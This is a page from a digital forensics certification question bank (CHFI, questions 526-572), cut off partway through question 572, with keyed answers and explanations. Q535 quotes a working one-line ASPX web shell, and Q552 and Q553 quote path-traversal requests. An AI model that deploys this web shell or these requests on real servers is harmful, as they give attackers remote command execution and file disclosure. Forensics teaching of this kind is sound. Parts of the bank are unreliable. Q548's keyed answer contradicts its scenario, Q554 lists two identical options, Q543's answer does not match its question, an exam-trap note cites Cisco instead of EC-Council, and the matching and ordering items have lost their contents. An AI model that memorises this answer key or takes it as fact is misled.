Computer Hacking Forensic Investigator (CHFI) — Questions 526-600

1000 questions total · 14 pages · All types, answers revealed

Page 8 of 14
526 · MCQ · easy

A security analyst reviews Windows Security Event Log and observes Event ID 4625 repeatedly for a single user account from a remote IP address within a short timeframe. What is the MOST likely cause?

A. The user successfully logged on from a remote workstation
B. A brute-force password attack is occurring against that account
C. The user's account was created
D. A service was installed on the system
Answer: B

Repeated failed logons from a remote IP indicate a brute-force attack.

Why this answer

Event ID 4625 indicates a failed logon attempt. Repeated failures from a remote IP suggest a brute-force password guessing attack.

527 · MCQ · easy

A first responder arrives at a scene where a computer is powered on and the user is present. According to standard forensic first responder procedures, what should the responder do FIRST?

A. Photograph the scene and document the system state
B. Boot the system from a forensic USB to create a memory dump
C. Immediately disconnect the power cord to preserve the hard drive
D. Ask the user to log out so the system can be powered off safely
Answer: A

Documenting the scene, including the screen contents, connections, and surroundings, is the first critical step.

Why this answer

Option A is correct because the first priority at a live scene is to preserve volatile evidence and establish a chain of custody. Photographing the scene and documenting the system state (e.g., running processes, open network connections, logged-in users) captures critical volatile data before any action is taken. This aligns with the order of volatility (RFC 3227), which mandates capturing memory and system state before altering the system.

Exam trap

The trap here is that candidates confuse the urgency of preserving the hard drive (Option C) with the forensic priority of capturing volatile data first, leading them to pull the plug prematurely.

How to eliminate wrong answers

Option B is wrong because booting from a forensic USB before documenting the scene risks overwriting volatile data (e.g., memory, process lists) and violates the order of volatility; memory dumps should be performed after initial documentation. Option C is wrong because immediately disconnecting power destroys volatile data (RAM, network connections) and can cause file system corruption; a controlled shutdown or live acquisition is preferred. Option D is wrong because asking the user to log out alters the system state (e.g., terminates processes, clears clipboard) and may destroy evidence of user activity; the responder should not involve the user in evidence preservation.

528 · MCQ · easy

Which file system artifact in NTFS is used to hide data by appending a stream to an existing file without affecting its primary data stream?

A. USN Journal
B. $Recycle.bin
C. Alternate Data Streams (ADS)
D. Master File Table ($MFT)
Answer: C

ADS allows data to be hidden in a separate stream.

Why this answer

Alternate Data Streams (ADS) allow hiding data by attaching additional streams to files. They are not visible in standard directory listings.

529 · MCQ · medium

A malware analyst uses Cuckoo Sandbox to analyze a sample. The report shows that the sample sends HTTP POST requests to 'http://malicious.example.com/gate.php' with encrypted data. Which type of indicator of compromise (IoC) is this?

A. Host-based IoC
B. Memory-based IoC
C. Hash-based IoC
D. Network-based IoC
Answer: D

The URL and domain are network artifacts indicating C2 communication.

Why this answer

The HTTP POST request to a remote URL with encrypted data is a classic network-based indicator because it involves communication over a network protocol (HTTP) to an external server. Cuckoo Sandbox captures this as a network artifact, making it a network-based IoC (Option D). Host-based IoCs focus on file system or registry changes, memory-based on in-RAM artifacts, and hash-based on file fingerprints.

Exam trap

EC-Council often tests the distinction between host-based and network-based IoCs by presenting a network artifact (like an HTTP request) and expecting candidates to recognize it as network-based, not host-based, even though the malware runs on the host.

How to eliminate wrong answers

Option A is wrong because host-based IoCs refer to artifacts on the local system (e.g., files created, registry keys modified, processes spawned), not outbound network traffic. Option B is wrong because memory-based IoCs involve artifacts found in RAM (e.g., injected code, API hooks, process memory dumps), not network packets. Option C is wrong because hash-based IoCs are cryptographic hashes (e.g., MD5, SHA-1, SHA-256) of files, used to identify known malware samples, not behavioral network patterns.

530 · MCQ · easy

Which of the following BEST describes Locard's exchange principle as applied to digital forensics?

A. Digital evidence must be collected using a write blocker.
B. The chain of custody must be documented for evidence to be admissible.
C. Volatile data must be collected before powering off a system.
D. Every contact leaves a trace; an attacker will leave digital evidence on the compromised system.
Answer: D

This correctly applies the principle to digital forensics.

Why this answer

Locard's exchange principle states that every contact leaves a trace. In digital forensics, this means that when an attacker interacts with a compromised system, they inevitably leave behind digital artifacts such as log entries, modified files, registry changes, or network connection records. Option D correctly captures this core concept as applied to digital forensics.

Exam trap

The trap here is that candidates confuse procedural best practices (write blockers, chain of custody, order of volatility) with the fundamental theoretical principle of trace evidence exchange, leading them to pick a practical step instead of the conceptual definition.

How to eliminate wrong answers

Option A is wrong because using a write blocker is a best practice for preserving the integrity of digital evidence during acquisition, but it is not a description of Locard's exchange principle. Option B is wrong because documenting the chain of custody is a legal and procedural requirement for evidence admissibility, not a statement of the exchange principle. Option C is wrong because collecting volatile data before powering off is a priority in incident response (order of volatility), but it does not describe the trace-leaving nature of Locard's principle.

531 · MCQ · easy

During a network forensic investigation, the analyst recovers a PCAP file. What type of information can be directly extracted from this file?

A. Files transferred via HTTP
B. Operating system version of the source host
C. Registry data of the destination host
D. Disk partition table of the sending computer
Answer: A

HTTP file transfers are visible in the payload of packets.

Why this answer

A PCAP file captures raw network packets. HTTP is an application-layer protocol that transmits data (e.g., files, web pages) in cleartext over TCP. By reassembling TCP streams from the captured packets, an analyst can directly extract files transferred via HTTP, as the payload contains the actual file content.

Exam trap

EC-Council often tests the distinction between what is directly extractable from packet payloads (e.g., HTTP files) versus what requires inference or additional forensic artifacts (e.g., OS fingerprinting or disk data), leading candidates to overestimate the information available in a PCAP.

How to eliminate wrong answers

Option B is wrong because the operating system version of the source host is not directly stored in packet headers; it can only be inferred through techniques like TCP/IP fingerprinting (e.g., analyzing TTL values, window sizes), not directly extracted. Option C is wrong because registry data resides on the local disk of the destination host and is never transmitted over the network in standard protocols; a PCAP contains only network traffic, not local filesystem artifacts. Option D is wrong because the disk partition table is a low-level disk structure that is not sent over the network during normal communication; it would require a full disk image, not a packet capture.

532 · Matching · medium

Match each forensic tool to its primary purpose.


Acquisition and preview of disk images

Forensic analysis and evidence processing

Memory forensics and analysis

Network packet capture and analysis

Open-source file system analysis

Why these pairings

These are standard tools used in digital forensics for specific tasks.

533 · MCQ · medium

Which network forensic technique involves analyzing the flow of network traffic to identify patterns and anomalies, often using tools like SiLK or nfdump?

A. Port scanning
B. NetFlow analysis
C. Signature-based detection
D. Deep packet inspection
Answer: B

NetFlow analysis uses flow records to summarize traffic, often used for anomaly detection.

Why this answer

NetFlow analysis examines flow records (e.g., IPFIX, NetFlow) to understand traffic patterns, volumes, and anomalies, using tools like SiLK or nfdump.

534 · MCQ · medium

An analyst suspects that an attacker used a web shell to execute commands on a Windows web server. Which Windows event ID should the analyst look for to detect service installation that may have been used for persistence?

A. 7045
B. 4624
C. 4648
D. 4720
Answer: A

Service installation event.

Why this answer

Event ID 7045 indicates a service was installed on the system, which attackers often use to maintain persistence.

535 · MCQ · hard

During a forensic investigation of a compromised web server, you find a file named 'cmd.aspx' in the uploads directory. The file contains: <%@ Page Language="C#" %><% Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c "+Request.QueryString["cmd"])).StandardOutput.ReadToEnd(); %>. What is the most likely purpose of this file?

A. It is a database connection string
B. It is a legitimate ASP.NET application page for server management
C. It is a webshell used for remote command execution
D. It is a cross-site scripting payload
Answer: C

The code runs cmd.exe with user-supplied commands, characteristic of a webshell.

Why this answer

This is a webshell that executes arbitrary operating system commands via the 'cmd' query parameter. It allows remote command execution on the server.

536 · MCQ · hard

In a Docker container forensics investigation, an analyst needs to examine the file system of a stopped container to look for malicious artifacts. Which command should the analyst run to create a recoverable snapshot of the container's file system without starting the container?

A. docker cp <container_id>:/path /host/path
B. docker export <container_id> -o output.tar
C. docker save <image_id> -o output.tar
D. docker commit <container_id>
Answer: B

docker export exports the container's file system as a tar archive, suitable for offline analysis, without starting the container.

Why this answer

docker export captures the file system of a stopped container as a tar archive for forensic analysis.

537 · MCQ · hard

In an email header, an analyst notices the following: 'Received: from mail.attacker.com (192.168.2.100) by mail.victim.com (Postfix) with ESMTP id ABC123 for <user@victim.com>; ...'. The 'From' address appears as 'ceo@victim.com'. Which type of attack is most likely?

A. Man-in-the-middle
B. Email spoofing
C. Malware attachment
D. Phishing
Answer: B

The mismatch between the From domain and the originating server indicates spoofing.

Why this answer

The email claims to be from 'ceo@victim.com' but was received from 'mail.attacker.com', indicating the sender forged the From address. This is email spoofing.

538 · MCQ · easy

An email forensic analyst receives a suspicious email and examines the full headers. Which header field is the MOST reliable for determining the true originating IP address of the sender, assuming no spoofing of the header?

A. Return-Path
B. Received
C. Message-ID
D. From
Answer: B

Each mail server adds its own Received header; the bottommost Received header (the first one added) typically shows the originating IP.

Why this answer

The Received headers are added by each SMTP server; the first Received header (bottommost) contains the IP of the originating server.

539 · MCQ · hard

A Windows system's registry key 'HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR' contains a subkey with a serial number. What does this artifact indicate?

A. A USB network adapter was attached
B. A USB storage device was attached
C. A USB printer was attached
D. A USB keyboard was attached
Answer: B

USBSTOR (USB Storage) records storage devices like flash drives.

Why this answer

The USBSTOR registry key records the serial numbers of USB storage devices that have been connected to the system. Its presence indicates a USB device was attached.

540 · MCQ · medium

During a forensic investigation, you need to acquire the RAM of a running Linux system. Which tool is specifically designed for memory acquisition on Linux?

A. Memdump
B. Volatility
C. WinPmem
D. LiME
Answer: D

LiME is the recommended tool for Linux memory acquisition.

Why this answer

LiME (Linux Memory Extractor) is a loadable kernel module that allows full system memory acquisition from Linux systems. It is the standard tool for Linux memory forensics.

541 · MCQ · easy

During a mobile forensics investigation, an examiner needs to acquire data from an iPhone running iOS 14. Which of the following acquisition methods provides the MOST complete data extraction?

A. File system acquisition via jailbreak
B. Manual acquisition by browsing the device
C. Physical acquisition via JTAG or chip-off
D. Logical acquisition via iTunes backup
Answer: C

Physical acquisition provides a complete bit-for-bit copy of the storage, including deleted and hidden data.

Why this answer

Physical acquisition via JTAG or chip-off provides the most complete data extraction because it captures a bit-for-bit copy of the raw NAND flash memory, including deleted files, unallocated space, and system partitions that are otherwise inaccessible. On iOS 14, Apple's security features (e.g., full-disk encryption, SEP) limit logical and file system methods, but physical techniques bypass the operating system to retrieve the entire storage image, albeit with decryption challenges.

Exam trap

EC-Council often tests the misconception that jailbreak-based file system acquisition is the most complete method, but physical acquisition (JTAG/chip-off) is technically superior because it captures the entire raw storage, including areas the OS hides or encrypts.

How to eliminate wrong answers

Option A is wrong because jailbreaking iOS 14 is often not possible or reliable due to Apple's hardened security (e.g., KTRR, PAC), and even if achieved, file system acquisition still cannot access the raw physical memory or unallocated space, leaving gaps in data recovery. Option B is wrong because manual acquisition only captures visible data through the user interface, missing hidden files, metadata, and deleted content, making it the least complete method. Option D is wrong because logical acquisition via iTunes backup only retrieves files that iOS chooses to include in the backup (e.g., app data, settings), excluding system files, deleted data, and unallocated space, and it relies on the backup encryption state.

542 · MCQ · medium

Which of the following is a key requirement for digital evidence to be considered admissible in court?

A. The evidence must be authentic and its integrity must be verifiable
B. The evidence must have been collected by a law enforcement officer
C. The evidence must be stored on a write-blocked device
D. The evidence must be encrypted to ensure confidentiality
Answer: A

Authenticity and integrity are fundamental to admissibility.

Why this answer

Digital evidence must be authentic and its integrity verifiable to meet the legal standard of admissibility, as established by rules such as the Federal Rules of Evidence (FRE 901) and the Daubert standard. Authentication requires proving that the evidence is what it claims to be, typically through a hash value (e.g., MD5, SHA-1, or SHA-256) computed before and after analysis to ensure no tampering occurred. Without verifiable integrity, the evidence could be challenged as altered, making it inadmissible regardless of how it was collected.

Exam trap

EC-Council often tests the misconception that procedural steps like write-blocking or law enforcement involvement are legal requirements, when in fact the core admissibility criterion is the ability to prove authenticity and integrity through verifiable means like hash values and chain of custody documentation.

How to eliminate wrong answers

Option B is wrong because digital evidence can be collected by any qualified forensic examiner, not exclusively a law enforcement officer; private-sector investigators or certified forensic analysts often handle evidence in civil cases. Option C is wrong because while write-blocking is a best practice to preserve evidence integrity, it is not a legal requirement for admissibility; evidence stored on a non-write-blocked device may still be admissible if integrity is otherwise proven (e.g., via hash verification). Option D is wrong because encryption is not a requirement for admissibility; in fact, encrypted evidence may be inadmissible if the decryption key is unavailable or if encryption obscures the evidence's authenticity, and confidentiality is separate from the legal standards of authenticity and integrity.

543 · MCQ · hard

An incident responder is analyzing a Linux system and finds a suspicious process running as root. To determine the full command line and environment variables of the process with PID 1234, which file in the /proc filesystem should she examine?

A. /proc/1234/status
B. /proc/1234/maps
C. /proc/1234/cmdline
D. /proc/1234/fd
Answer: C

cmdline contains the command line arguments of the process, separated by null bytes.

Why this answer

The /proc/[pid]/cmdline file contains the full command line of the process, while environment variables live in /proc/[pid]/environ. Although the question mentions both, cmdline is the only one of these files among the options, so it is the answer.

544 · MCQ · easy

In Android forensics, which command is used to extract a full physical image of a device's flash memory over USB using the Android Debug Bridge (ADB)?

A. adb pull /data data.img
B. adb shell dd if=/dev/block/mmcblk0 of=/sdcard/physical.img
C. adb backup -f backup.ab
D. adb install physical.img
Answer: B

dd copies the raw block device to a file, creating a physical image.

Why this answer

Option B is correct because the `adb shell dd if=/dev/block/mmcblk0 of=/sdcard/physical.img` command uses the `dd` utility to perform a bit-for-bit copy of the raw block device representing the internal flash memory (mmcblk0) to a file on the device's SD card, which can then be pulled via ADB. This method captures a full physical image, including deleted data and unallocated space, which is essential for deep forensic analysis.

Exam trap

Cisco often tests the distinction between logical acquisition (adb pull) and physical acquisition (adb shell dd), so the trap here is that candidates confuse the simple file copy command (adb pull) with the raw block-level imaging command (adb shell dd), assuming any command with 'pull' or 'backup' can produce a forensic image.

How to eliminate wrong answers

Option A is wrong because `adb pull /data data.img` only copies the logical contents of the /data partition, not a raw block-level image, and thus misses deleted files, unallocated space, and metadata from other partitions. Option C is wrong because `adb backup -f backup.ab` creates a logical backup of app data and system settings, not a physical image of flash memory; it does not capture the raw block device or unallocated space. Option D is wrong because `adb install physical.img` is used to install an APK file, not to extract an image; attempting to install a raw image file would fail or corrupt the device.

545 · Multi-Select · hard

Which THREE of the following are characteristics of the GPT (GUID Partition Table) compared to MBR?

Select 3 answers
A. Partition information is stored in the boot code area
B. Uses a 32-bit Logical Block Address (LBA)
C. Partitions are identified by a Globally Unique Identifier (GUID)
D. Supports up to 128 primary partitions
E. Stores a backup partition table at the end of the disk
Answers: C, D, E

Each partition has a GUID.

Why this answer

GPT uses GUIDs, supports up to 128 partitions, stores a backup partition table at the end, and uses 64-bit LBA. It does not store partitions in the boot code area.

546 · MCQ · easy

Locard's exchange principle is fundamental to forensic science. How does this principle apply to computer forensics?

A. Every action on a digital device leaves some trace of evidence.
B. Digital evidence is always volatile and must be preserved immediately.
C. Evidence must be collected within 24 hours.
D. Only physical evidence, such as fingerprints, can be left at a crime scene.
Answer: A

Logs, metadata, artifacts are all traces of activity.

Why this answer

Locard's principle states that every contact leaves a trace; in digital forensics, this translates to digital traces left behind when a system is accessed.

547 · MCQ · medium

An analyst is investigating a data exfiltration incident. The MySQL transaction logs show a series of unusual SELECT queries retrieving large amounts of data from the 'customers' table, executed by a user account 'webapp'. What should the analyst check NEXT to determine if the data was actually exfiltrated?

A. Review the web server access logs for requests to external IPs containing the queried data
B. Examine the database schema for unauthorized stored procedures
C. Analyze the MySQL audit logs for privilege escalation attempts
D. Check the MySQL binary logs for any DELETE or DROP statements
Answer: A

Web server logs may show HTTP requests exfiltrating data, providing evidence of actual transfer.

Why this answer

After identifying suspicious queries, the analyst should check the application server logs to see if the results were sent externally.

548 · MCQ · medium

During dynamic analysis of a malware sample in Any.run, an analyst observes that the malware writes a value to HKCU\Software\Microsoft\Windows\CurrentVersion\Run and also creates a scheduled task named 'UpdateTask'. Which anti-forensic technique is the malware MOST likely attempting to counter?

A. Packing
B. Encryption
C. Timestomping
D. Log wiping
Answer: D

Creating persistence and then cleaning up traces is a form of log wiping to hide its presence.

Why this answer

Persistence mechanisms like Run keys and scheduled tasks are often monitored by security tools. If malware attempts to delete or modify these after execution, it is trying to remove evidence of persistence, which is a form of log wiping or anti-forensics.

549 · MCQ · medium

A cloud forensic investigator is examining AWS CloudTrail logs for signs of unauthorized access to an S3 bucket. Which of the following CloudTrail event names would indicate a successful attempt to list the objects in the bucket?

A. GetObject
B. PutObject
C. DeleteObject
D. ListObjects
Answer: D

ListObjects is the API call to list objects in a bucket.

Why this answer

The ListObjects operation lists the objects in an S3 bucket; the CloudTrail event name is 'ListObjects'.

550 · MCQ · hard

During a forensic investigation of a Windows 10 system, you find that a suspect used the 'cipher /w:C:' command. What is the primary forensic implication of this action?

A. It encrypts all files on the C: drive
B. It wipes free space, hindering recovery of deleted files
C. It enables file system journaling
D. It removes alternate data streams from files
Answer: B

cipher /w overwrites free space to prevent recovery of deleted data.

Why this answer

The `cipher /w:C:` command overwrites free space on the C: drive with zeros, making deleted file recovery from unallocated space much more difficult.

551 · MCQ · easy

An analyst is investigating a compromised Linux system. Which file system structure holds metadata about every file and directory, including permissions, ownership, timestamps, and pointers to data blocks?

A. Journal
B. Block bitmap
C. Superblock
D. Inode
Answer: D

Each file and directory has an inode containing metadata and pointers to data blocks.

Why this answer

Inodes are data structures in ext2/3/4 that store metadata about files and directories.

552 · MCQ · medium

An IIS log entry shows: `2024-07-15 14:22:10 10.0.0.5 GET /../../windows/system32/cmd.exe 404 - Mozilla/5.0`. What attack technique does this log entry indicate?

A. Remote code execution (RCE)
B. Directory traversal
C. Cross-site request forgery (CSRF)
D. SQL injection
Answer: B

The ../ sequences are used to traverse directories and access cmd.exe, a classic path traversal attempt.

Why this answer

The presence of '../' sequences in the URI path indicates a path traversal attack attempting to access files outside the web root.

553 · MCQ · medium

A security analyst finds the following entry in the Apache access log: 10.0.0.5 - - [20/Jan/2023:08:12:44 +0000] "GET /../../../../etc/passwd HTTP/1.1" 404 345 "-" "curl/7.68.0". Which attack was attempted?

A. Remote File Inclusion
B. Path Traversal
C. Command Injection
D. Cross-Site Request Forgery (CSRF)
Answer: B

The '../' sequences are used to navigate directories outside the web root to access sensitive files.

Why this answer

The URI contains '../../../../etc/passwd', which is a path traversal attempt to read the /etc/passwd file. The 404 status indicates the file was not found, but the intent is clear.

554 · MCQ · hard

During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 02:15:30 server sshd[1234]: Failed password for root from 10.0.0.5 port 54321 ssh2'. Which command would you use to extract all failed root login attempts from this log?

A. awk '/Failed password for root/' /var/log/auth.log
B. grep 'Failed password for root' /var/log/auth.log
C. grep 'Failed password for root' /var/log/auth.log
D. grep 'invalid.*root' /var/log/auth.log
Answer: B

This command extracts all lines containing 'Failed password for root', which matches the failed root login attempts.

Why this answer

The grep command filters the lines containing 'Failed password for root' from the auth.log file. A -i (case-insensitive) flag is unnecessary here, since the pattern already matches the case used in the log entry.

555 · MCQ · hard

An investigator is analyzing a RAID 5 array consisting of three disks. One disk fails and is replaced. After rebuilding, the file system appears corrupted. What is the MOST likely cause?

A. Two disks failed simultaneously
B. The replacement disk is smaller than the original
C. The file system is not supported by the RAID controller
D. The array was configured with an incorrect stripe size
Answer: B

RAID 5 requires all disks to be the same size; a smaller disk can cause rebuild errors.

Why this answer

RAID 5 can tolerate one disk failure. If the replacement disk is smaller than the original, the rebuild may fail or cause corruption.

556 · Drag & Drop · medium

Drag and drop the steps to perform a forensic analysis of a USB drive to identify the connected computer using Windows artifacts into the correct order.


Why this order

USB forensics involves registry keys, device logs, and correlation with event logs.

557 · MCQ · hard

A network analyst captures a packet with Wireshark showing a TCP SYN packet from IP 10.0.0.5 to 192.168.1.10 port 443, followed immediately by a SYN-ACK from 192.168.1.10 to 10.0.0.5, then an RST from 10.0.0.5. What does this sequence MOST likely indicate?

A. A man-in-the-middle attack
B. A denial-of-service (SYN flood) attack
C. A normal HTTPS session initiation
D. A TCP SYN scan (stealth scan)
Answer: D

The RST after SYN-ACK is characteristic of a SYN scan.

Why this answer

A SYN followed by SYN-ACK and then RST is typical of a port scan where the scanner sends a SYN, receives a SYN-ACK (port open), and then immediately resets the connection to avoid completing the handshake.

558 · MCQ · hard

During a forensic examination of a Windows system infected with ransomware, the analyst finds that the file timestamps (creation, modification, access) for several critical system files have been altered to match legitimate Windows files. Which anti-forensic technique is MOST likely being used?

A. Data hiding via ADS
B. Steganography
C. Log wiping
D. Timestomping
Answer: D

Timestomping modifies file timestamps to evade forensic analysis.

Why this answer

Timestomping is the deliberate alteration of file timestamps (creation, modification, access) to mislead forensic investigators. In this scenario, the ransomware modified critical system file timestamps to match legitimate Windows files, which is the hallmark of timestomping. This technique is commonly used to evade timeline analysis and hide the true sequence of malicious activity.

Exam trap

EC-Council often tests the distinction between timestomping (altering file timestamps) and log wiping (removing event logs), so the trap here is that candidates may confuse 'log wiping' with any timestamp-related manipulation, but log wiping specifically targets event logs, not file metadata.

How to eliminate wrong answers

Option A is wrong because data hiding via Alternate Data Streams (ADS) conceals data within NTFS file streams without altering timestamps, not by modifying them to match legitimate files. Option B is wrong because steganography hides data within other files (e.g., images or audio) and does not involve changing file timestamps. Option C is wrong because log wiping targets system or application logs to remove evidence, not file metadata timestamps on the filesystem.

559 · Multi-Select · medium

An email investigation reveals that a phishing email was sent from a domain that uses DKIM and SPF. The email headers contain: 'DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=selector1; bh=...; h=...; b=...' and 'Received-SPF: pass (example.com: domain of sender@example.com designates 203.0.113.5 as permitted sender)'. Which TWO conclusions can be drawn?

Select 2 answers
A. The email is definitely legitimate and not spoofed
B. The email's DKIM signature is valid
C. The email was sent from a compromised account
D. The email originated from a different domain
E. The sending server (203.0.113.5) is authorized by the domain's SPF record
Answers: B, E

A valid DKIM signature is present.

Why this answer

SPF pass indicates the sending IP is authorized; DKIM signature validates the email was signed by the domain. Combined, the email is likely not spoofed.

560 · MCQ · hard

An analyst finds the following entry in an IIS access log: 10.0.0.5, -, 10/10/2023, 14:30:22, W3SVC1, WEB01, 192.168.1.100, 80, GET, /login.aspx, 200, 0, 1234, 567, Mozilla/5.0+. Based on the log format, which field contains the HTTP status code?

A. 200
B. GET
C. 80
D. 0
Answer: A

The status code is typically placed after the URI stem.

Why this answer

IIS W3C Extended Log Format includes fields: date, time, client IP, cs-uri-stem, sc-status. In the given entry, the status code 200 appears after the URI and before the 0 (sc-substatus).

561 · MCQ · easy

An Android phone is found at a crime scene. The phone is locked with a PIN. The forensic examiner wants to extract data without bypassing the lock. Which of the following is the MOST appropriate logical acquisition method?

A. Use Cellebrite UFED to perform a file system extraction
B. Perform a physical acquisition via JTAG
C. Perform an ADB backup
D. Use ADB to pull /data/data/ directory
Answer: C

ADB backup can extract user app data if USB debugging was enabled before locking; it does not require root.

Why this answer

ADB backup (option C) is the most appropriate logical acquisition method for a locked Android phone because it uses the Android Backup protocol over ADB, which can extract application data without needing to bypass the lock screen, provided USB debugging is enabled and the device authorizes the backup. This method does not require root access or physical disassembly, making it a non-invasive logical acquisition technique.

Exam trap

EC-Council often tests the misconception that ADB pull can access /data/data/ on a locked device, but in reality, ADB pull requires root or an unlocked device, while ADB backup is a distinct protocol that can extract data without bypassing the lock screen under specific conditions.

How to eliminate wrong answers

Option A is wrong because Cellebrite UFED's file system extraction typically requires the device to be unlocked or uses exploits to bypass the lock, which contradicts the requirement of not bypassing the lock. Option B is wrong because JTAG is a physical acquisition method that involves hardware-level access and often requires disassembly or bypassing the lock, not a logical acquisition method. Option D is wrong because ADB pull of /data/data/ directory requires root access or an unlocked device to read protected app data, and on a locked phone without root, ADB cannot access that directory.

562
MCQ · medium

A forensic investigator needs to collect evidence from a Google Cloud Platform (GCP) environment. Which of the following GCP services provides audit logs for administrative activities and data access?

A.Cloud Storage logs
B.Cloud Monitoring
C.Cloud IAM
D.Cloud Audit Logs
Answer: D

Cloud Audit Logs capture who did what, where, and when.

Why this answer

Cloud Audit Logs in GCP record administrative activities (Admin Activity logs) and data access (Data Access logs) for GCP resources.

563
MCQ · medium

In an ext4 file system, after a file is deleted, the inode's di_mode field is set to 0 and the block pointers are cleared. However, the file content may still be recoverable until what happens?

A.The data blocks are overwritten by new files
B.The file system is unmounted
C.The superblock is updated
D.The journal is committed
Answer: A

Once the blocks are reassigned and overwritten, recovery becomes difficult.

Why this answer

In ext4, when a file is deleted, its inode is marked as free, and data blocks are added to the free block bitmap. Recovery is possible if the blocks have not been reused.

564
MCQ · easy

During a mobile forensics investigation, an analyst needs to acquire data from an iPhone that cannot be bypassed via passcode. The device is locked, and the analyst has the passcode. Which acquisition method provides the MOST comprehensive data extraction?

A.Physical acquisition
B.Manual acquisition
C.Logical acquisition
D.File system acquisition
Answer: A

Physical acquisition creates a full image of the device's storage, retrieving all data including deleted files.

Why this answer

Physical acquisition is the most comprehensive method because it creates a bit-for-bit copy of the entire flash storage, including the operating system, kernel, unallocated space, and deleted file remnants. Even with the passcode known, a locked iPhone restricts file system access via USB, but physical acquisition (often using advanced techniques like JTAG or chip-off) bypasses these restrictions to extract the raw NAND data, yielding the fullest forensic picture.

Exam trap

EC-Council often tests the misconception that 'logical acquisition' or 'file system acquisition' is sufficient for locked devices, but the trap is that even with the passcode, a locked iPhone restricts file system access via USB, making physical acquisition the only method that can bypass these restrictions and capture the full storage image.

How to eliminate wrong answers

Option B (Manual acquisition) is wrong because it relies on visually navigating the device and photographing or recording the screen, which only captures visible data and cannot extract deleted files, system files, or data from locked partitions. Option C (Logical acquisition) is wrong because it only retrieves files accessible through the operating system's APIs (e.g., via iTunes backup or libimobiledevice), missing unallocated space, deleted data, and system-level artifacts. Option D (File system acquisition) is wrong because, while it provides more data than logical acquisition by accessing the file system hierarchy, it still requires the device to be unlocked and cannot capture raw NAND blocks, unallocated space, or data from protected areas like the kernel cache.

565
Multi-Select · hard

Which THREE of the following are considered types of evidence under the rules of evidence? (Choose three.)

Select 3 answers
A.Corroborating evidence
B.Best evidence
C.Circumstantial evidence
D.Direct evidence
E.Hearsay evidence
Answers: C, D, E

Evidence that implies a fact but does not directly prove it.

Why this answer

Circumstantial evidence is a recognized type of evidence under the rules of evidence because it relies on an inference to connect a fact to a conclusion, rather than directly proving the fact. In digital forensics, circumstantial evidence might include log entries showing a user logged in at the time of an incident, which indirectly suggests involvement. It is admissible as long as the chain of inferences is reasonable and supported by other facts.

Exam trap

EC-Council often tests the distinction between 'types of evidence' and 'rules governing evidence'—candidates confuse the best evidence rule (a procedural rule) with a type of evidence, leading them to incorrectly select 'Best evidence' as a type.

566
MCQ · easy

A forensic analyst is examining a FAT32 file system and finds that the file allocation table indicates a cluster chain ending with 0x0FFFFFFF. What does this value signify?

A.End-of-file marker
B.Free cluster
C.Reserved cluster
D.Bad cluster
Answer: A

0x0FFFFFFF is the end-of-cluster-chain marker.

Why this answer

In FAT32 file systems, the File Allocation Table (FAT) uses 32-bit entries to track cluster allocation. The value 0x0FFFFFFF is the defined end-of-file (EOF) marker, indicating that the current cluster is the last in a file's cluster chain. This is a standard FAT32 convention, distinct from other special values like free or bad clusters.

Exam trap

The trap here is confusing the FAT32 EOF marker (0x0FFFFFFF) with the bad cluster marker (0x0FFFFFF7) or the reserved cluster range (0x0FFFFFF0–0x0FFFFFF6), as EC-Council often tests the exact hex values to catch candidates who memorize concepts without the precise numbers.

How to eliminate wrong answers

Option B is wrong because a free cluster is represented by the value 0x00000000 in FAT32, not 0x0FFFFFFF. Option C is wrong because reserved clusters are indicated by values in the range 0x0FFFFFF0 through 0x0FFFFFF6, not 0x0FFFFFFF. Option D is wrong because a bad cluster is marked with the value 0x0FFFFFF7 in FAT32, which is a specific sentinel for physical media defects.

567
MCQ · hard

In an ext3 file system, after deleting a file, the inode's link count drops to 0, but the data blocks remain. Which of the following is true regarding recovery?

A.The file can be recovered by reading the journal and replaying the deletion transaction
B.The file may be recovered through file carving by searching for known file signatures in the data blocks
C.The file cannot be recovered because ext3 zeroes the inode on deletion
D.The file can be recovered by undeleting the inode using debugfs or extundelete
Answer: B

Since data blocks are not overwritten immediately, file carving can recover the file by finding its header/footer signatures.

Why this answer

In ext3, deleting a file clears the inode and data block pointers. Recovery requires scanning the raw disk for file signatures (file carving) because the inode no longer points to the data.

568
Multi-Select · hard

Which THREE of the following are acceptable best practices when acquiring evidence from a mobile device? (Choose three.)

Select 3 answers
A.Document the SIM card information
B.Capture a logical image of the device if it is unlocked
C.Power off the device immediately to preserve battery
D.Place the device in a Faraday bag to prevent remote wiping
E.Only perform a physical acquisition, as it is the only forensically sound method
Answers: A, B, D

SIM card contains subscriber information.

Why this answer

Option A is correct because documenting the SIM card information, such as the ICCID (Integrated Circuit Card Identifier) and IMSI (International Mobile Subscriber Identity), is a critical step in establishing chain of custody and preserving evidence that may link the device to a specific subscriber or network. This documentation must occur before any acquisition to ensure the SIM's data is not altered by subsequent imaging or isolation procedures.

Exam trap

EC-Council often tests the misconception that powering off a device is always safe for preservation, when in fact it can trigger encryption and destroy volatile evidence, and that physical acquisition is the only valid forensic method, ignoring the forensic validity of logical acquisitions on unlocked devices.

569
Multi-Select · medium

Which TWO of the following tools are primarily used for timeline analysis in digital forensics? (Select TWO.)

Select 2 answers
A.Nmap
B.The Sleuth Kit (mactime)
C.Autopsy
D.Plaso
E.Wireshark
Answers: B, D

The Sleuth Kit includes mactime for creating timelines from disk images.

Why this answer

Plaso (log2timeline) and The Sleuth Kit (with mactime) are both used to create super timelines from file system metadata.

570
Multi-Select · hard

Which THREE of the following are commonly used for persistence on a Windows system? (Choose THREE.)

Select 3 answers
A.LNK files
B.Registry Run keys
C.Service installations
D.Prefetch files
E.Scheduled tasks
Answers: B, C, E

Common persistence via auto-start programs.

Why this answer

Registry Run keys, scheduled tasks, and service installations are common persistence mechanisms. Prefetch files and LNK files are forensic artifacts but not persistence mechanisms.

571
MCQ · medium

A forensic investigator finds a suspicious file named `cmd.aspx` in the web root of a compromised IIS server. The file contains code that accepts command input via HTTP GET parameters and executes it on the server. What is the MOST likely classification of this file?

A.Trojan horse
B.Cross-site scripting (XSS) exploit
C.SQL injection payload
D.Web shell
Answer: D

A web shell allows remote command execution via HTTP requests, fitting the description.

Why this answer

A file that accepts commands via HTTP and executes them on the server is a web shell. ASPX is a common extension for .NET web shells.

572
MCQ · medium

